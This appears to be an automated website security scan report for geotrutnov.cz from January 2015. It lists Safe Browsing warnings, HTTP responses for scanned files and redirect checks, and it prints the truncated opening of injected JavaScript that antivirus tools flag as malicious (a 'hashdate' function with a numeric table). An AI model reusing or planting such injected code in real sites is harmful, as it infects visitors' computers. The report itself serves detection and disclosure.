Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=geotrutnov.cz
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://geotrutnov.cz/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 29 Jan 2015 04:45:46 GMT Location: http://www.geotrutnov.cz/ Server: Apache/2.2.22 (Debian) Vary: Accept-Encoding Content-Length: 312 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.geotrutnov.cz/ | 200 OK Content-Length: 7437 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function hashdate (str) {if(!str) {var date=new Date();var str = date.getUTCFullYear() + "/" + (date.getUTCMonth()+1) + "/" + date.getUTCDate() + " " + (date.getHours() >= 12 ? 'PM':'AM');};var table = [0,1996959894,3993919788,2567524794,124634137,1886057615,3915621685,2657392035,249268274,2044508324,3772115230,2547177864,162941995,2125561021,3887607047,2428444049,498536548,1789927666,4089016648,2227061214,450548861,1843258603,4107580753,2211677639,325883990,1684777152,4251122042,2321926636,3 Antivirus reports: | ||
http://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js | 200 OK Content-Length: 93100 Content-Type: text/javascript | clean |
http://geotrutnov.cz/js/geo1.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 29 Jan 2015 04:45:47 GMT Location: http://www.geotrutnov.cz/js/geo1.js Server: Apache/2.2.22 (Debian) Vary: Accept-Encoding Content-Length: 322 Content-Type: text/html; charset=iso-8859-1 X-Pad: avoid browser bug | clean |
http://www.geotrutnov.cz/js/geo1.js | 404 Not Found Content-Length: 208 Content-Type: text/html | clean |
http://www.geotrutnov.cz/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://miniaplikace.blueboard.cz/counter_1.php?jid=kau25f31ojmmr02mb2tkvcix42unpo | 200 OK Content-Length: 611 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: geotrutnov.cz
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 29 Jan 2015 04:45:46 GMT
Location: http://www.geotrutnov.cz/
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 312
Content-Type: text/html; charset=iso-8859-1
...312 bytes of data.
GET / HTTP/1.1
Host: geotrutnov.cz
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 29 Jan 2015 04:45:46 GMT
Location: http://www.geotrutnov.cz/
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 312
Content-Type: text/html; charset=iso-8859-1
...312 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: geotrutnov.cz
Referer: http://www.google.com/search?q=geotrutnov.cz
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: geotrutnov.cz
Referer: http://www.google.com/search?q=geotrutnov.cz
Result:
The result is similar to the first query. There are no suspicious redirects found.